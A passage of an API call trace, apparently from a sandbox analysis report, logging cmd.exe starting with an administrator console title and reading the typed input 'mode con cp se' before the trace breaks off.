0x1e82e3d0040 [0173.110] GetProcessHeap () returned 0x1e82e4b0000 [0173.110] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x40) returned 0x1e82e4b84b0 [0173.110] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1e82e3d0040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0173.110] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x1e82e3d0040, lpFilePart=0x33a02ff6a0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x33a02ff6a0*="Desktop") returned 0x17 [0173.111] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0173.111] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x33a02ff3d0 | out: lpFindFileData=0x33a02ff3d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x1e82e4b8500 [0173.111] FindClose (in: hFindFile=0x1e82e4b8500 | out: hFindFile=0x1e82e4b8500) returned 1 [0173.112] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x33a02ff3d0 | out: lpFindFileData=0x33a02ff3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x1e82e4b8500 [0173.112] FindClose (in: hFindFile=0x1e82e4b8500 | out: hFindFile=0x1e82e4b8500) returned 1 [0173.112] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x33a02ff3d0 | out: lpFindFileData=0x33a02ff3d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x1bafb13d, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x1bafb13d, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x1e82e4b8500 [0173.112] FindClose (in: hFindFile=0x1e82e4b8500 | out: hFindFile=0x1e82e4b8500) returned 1 [0173.112] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0173.112] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0173.112] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0173.112] GetProcessHeap () returned 0x1e82e4b0000 [0173.112] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b7a10) returned 1 [0173.112] GetEnvironmentStringsW () returned 0x1e82e4b0fc0* [0173.113] GetProcessHeap () returned 0x1e82e4b0000 [0173.113] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0xacc) returned 0x1e82e4b8500 [0173.113] FreeEnvironmentStringsA (penv="=") returned 1 [0173.113] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1e82e3b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0173.113] GetProcessHeap () returned 0x1e82e4b0000 [0173.113] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b84b0) returned 1 [0173.113] ??_V@YAXPEAX@Z () returned 0x1 [0173.113] ??_V@YAXPEAX@Z () returned 0x1 [0173.113] GetProcessHeap () returned 0x1e82e4b0000 [0173.113] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x4016) returned 0x1e82e4b8fe0 [0173.114] GetProcessHeap () returned 0x1e82e4b0000 [0173.114] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b8fe0) returned 1 [0173.114] GetConsoleOutputCP () returned 0x1b5 [0173.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6e407fbb0 | out: lpCPInfo=0x7ff6e407fbb0) returned 1 [0173.381] GetUserDefaultLCID () returned 0x409 [0173.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff6e407bb78, cchData=8 | out: lpLCData=":") returned 2 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x33a02ffa60, cchData=128 | out: lpLCData="0") returned 2 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x33a02ffa60, cchData=128 | out: lpLCData="0") returned 2 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x33a02ffa60, cchData=128 | out: lpLCData="1") returned 2 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff6e407bb68, cchData=8 | out: lpLCData="/") returned 2 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff6e407bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff6e407bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff6e407ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff6e407ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff6e407ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff6e407b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff6e407b980, cchData=32 | out: lpLCData="Sun") returned 4 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff6e407bb58, cchData=8 | out: lpLCData=".") returned 2 [0173.382] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff6e407bb40, cchData=8 | out: lpLCData=",") returned 2 [0173.382] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.385] GetProcessHeap () returned 0x1e82e4b0000 [0173.385] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, Size=0x20c) returned 0x1e82e4b6560 [0173.385] GetConsoleTitleW (in: lpConsoleTitle=0x1e82e4b6560, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0173.394] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.394] GetFileType (hFile=0x254) returned 0x3 [0173.397] ApiSetQueryApiSetPresence () returned 0x0 [0173.397] ResolveDelayLoadedAPI () returned 0x7ffccc74d990 [0173.938] BrandingFormatString () returned 0x1e82e4b6a50 [0173.945] GetVersion () returned 0x3ad7000a [0173.945] _vsnwprintf (in: _Buffer=0x33a02ffbc0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x33a02ffb58 | out: _Buffer="10.0.15063") returned 10 [0173.945] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.945] GetFileType (hFile=0x254) returned 0x3 [0173.945] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6e4087f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0173.946] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6e4087f60, nSize=0x2000, Arguments=0x33a02ffb60 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0173.946] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.946] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0173.946] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6e4079970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x33a02ffab8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesWritten=0x33a02ffab8*=0x26, lpOverlapped=0x0) returned 1 [0173.946] _vsnwprintf (in: _Buffer=0x7ff6e4087f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x33a02ffb88 | out: _Buffer="\r\n") returned 2 [0173.946] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.946] GetFileType (hFile=0x254) returned 0x3 [0173.946] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.947] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0173.947] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6e4079970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33a02ffb58, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesWritten=0x33a02ffb58*=0x2, lpOverlapped=0x0) returned 1 [0173.947] _vsnwprintf (in: _Buffer=0x7ff6e4087f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0x33a02ffb88 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0173.947] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.947] GetFileType (hFile=0x254) returned 0x3 [0173.947] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.947] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0173.947] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6e4079970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x33a02ffb58, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesWritten=0x33a02ffb58*=0x34, lpOverlapped=0x0) returned 1 [0173.947] _vsnwprintf (in: _Buffer=0x7ff6e4087f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x33a02ffb88 | out: _Buffer="\r\n") returned 2 [0173.947] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.947] GetFileType (hFile=0x254) returned 0x3 [0173.947] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.947] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0173.947] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6e4079970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33a02ffb58, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesWritten=0x33a02ffb58*=0x2, lpOverlapped=0x0) returned 1 [0173.948] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffce9120000 [0173.948] GetProcAddress (hModule=0x7ffce9120000, lpProcName="CopyFileExW") returned 0x7ffce913e830 [0173.948] GetProcAddress (hModule=0x7ffce9120000, lpProcName="IsDebuggerPresent") returned 0x7ffce913e300 [0173.948] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffce6900a40 [0173.948] ??_V@YAXPEAX@Z () returned 0x1 [0173.949] _get_osfhandle (_FileHandle=0) returned 0x248 [0173.949] GetFileType (hFile=0x248) returned 0x3 [0173.949] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0173.949] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x33a02ff9c8 | out: TokenHandle=0x33a02ff9c8*=0x0) returned 0xc000007c [0173.949] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x33a02ff9c8 | out: TokenHandle=0x33a02ff9c8*=0x98) returned 0x0 [0173.949] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x12, TokenInformation=0x33a02ff978, TokenInformationLength=0x4, ReturnLength=0x33a02ff980 | out: TokenInformation=0x33a02ff978, ReturnLength=0x33a02ff980) returned 0x0 [0173.949] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x1a, TokenInformation=0x33a02ff980, TokenInformationLength=0x4, ReturnLength=0x33a02ff978 | out: TokenInformation=0x33a02ff980, ReturnLength=0x33a02ff978) returned 0x0 [0173.949] NtClose (Handle=0x98) returned 0x0 [0173.949] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x33a02ff990, nSize=0x0, Arguments=0x33a02ff998 | out: lpBuffer="᧰⹋Ǩ") returned 0xf [0173.962] GetProcessHeap () returned 0x1e82e4b0000 [0173.962] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x218) returned 0x1e82e4b6c30 [0174.020] GetConsoleTitleW (in: lpConsoleTitle=0x33a02ff9e0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0174.915] wcsstr (_Str="C:\\WINDOWS\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0174.915] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0175.847] GetProcessHeap () returned 0x1e82e4b0000 [0175.847] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b6c30) returned 1 [0175.847] LocalFree (hMem=0x1e82e4b19f0) returned 0x0 [0175.924] _vsnwprintf (in: _Buffer=0x7ff6e4087f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x33a02ff808 | out: _Buffer="\r\n") returned 2 [0175.924] _get_osfhandle (_FileHandle=1) returned 0x254 [0175.924] GetFileType (hFile=0x254) returned 0x3 [0175.924] _get_osfhandle (_FileHandle=1) returned 0x254 [0175.924] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0175.924] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6e4079970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33a02ff7d8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesWritten=0x33a02ff7d8*=0x2, lpOverlapped=0x0) returned 1 [0175.924] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6e407bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0175.924] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1e82e3b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0175.924] malloc (_Size=0x107ce) returned 0x1e82e3c0060 [0175.925] _vsnwprintf (in: _Buffer=0x1e82e3c0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x33a02ff818 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0175.925] _vsnwprintf (in: _Buffer=0x1e82e3c008e, _BufferCount=0x83ce, _Format="%c", _ArgList=0x33a02ff818 | out: _Buffer=">") returned 1 [0175.925] _get_osfhandle (_FileHandle=1) returned 0x254 [0175.925] GetFileType (hFile=0x254) returned 0x3 [0175.925] _get_osfhandle (_FileHandle=1) returned 0x254 [0175.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop>", lpUsedDefaultChar=0x0) returned 25 [0175.925] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6e4079970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x33a02ff808, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesWritten=0x33a02ff808*=0x18, lpOverlapped=0x0) returned 1 [0175.925] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.925] GetFileType (hFile=0x248) returned 0x3 [0175.925] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.926] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.926] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.926] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c30, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0175.926] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.926] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.926] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.926] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c32, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0175.926] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.926] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.926] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.926] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c34, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0175.926] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.926] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.926] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.926] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c36, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0175.926] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.926] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.926] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.926] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c38, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.926] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.927] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.927] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c3a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0175.927] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.927] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.927] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c3c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0175.927] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.927] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.927] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c3e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0175.927] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.927] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.927] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.927] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.927] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.927] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c42, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0175.927] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.927] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.927] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c44, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0175.928] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.928] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.928] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c46, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.928] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.928] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.928] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c48, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0175.928] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.928] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.928] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c4a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0175.928] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.928] SetFilePointer (in: 